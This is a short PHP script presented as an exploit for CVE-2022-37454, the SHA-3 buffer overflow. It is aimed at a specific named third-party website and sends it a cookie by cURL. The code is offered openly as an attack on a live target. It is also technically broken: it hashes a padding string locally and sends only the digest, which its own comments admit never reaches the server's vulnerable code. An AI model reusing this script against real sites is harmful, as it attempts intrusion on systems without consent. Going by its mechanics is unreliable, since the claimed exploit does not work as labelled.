<?php
// CVE-2022-37454 exploit code
// Based on https://www.rapid7.com/db/vulnerabilities/php-cve-2022-37454/

// Target URL
$url = "https://fastfounder.ru/na-kazhdom-zarabotat/";

// Payload to execute arbitrary code or eliminate expected cryptographic properties
$payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

// Create a hash object using the SHA-3 algorithm
$hash = hash_init("sha3-512");

// Update the hash with the payload
hash_update($hash, $payload);

// Get the hash value (hex digest, computed locally by this PHP runtime)
$hash_value = hash_final($hash);

// Send the hash value as a cookie or a parameter to the target URL.
// Intended to trigger the buffer overflow and execute the payload or break the cryptography;
// as written, only the locally computed hex digest is sent, so the payload itself
// never reaches the server's SHA-3 code.
$ch = curl_init(); // Initialise the cURL handle used below
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIE, "hash=$hash_value"); // or use CURLOPT_POSTFIELDS for parameters
$output = curl_exec($ch);
curl_close($ch);

// Print the output
echo $output;
?>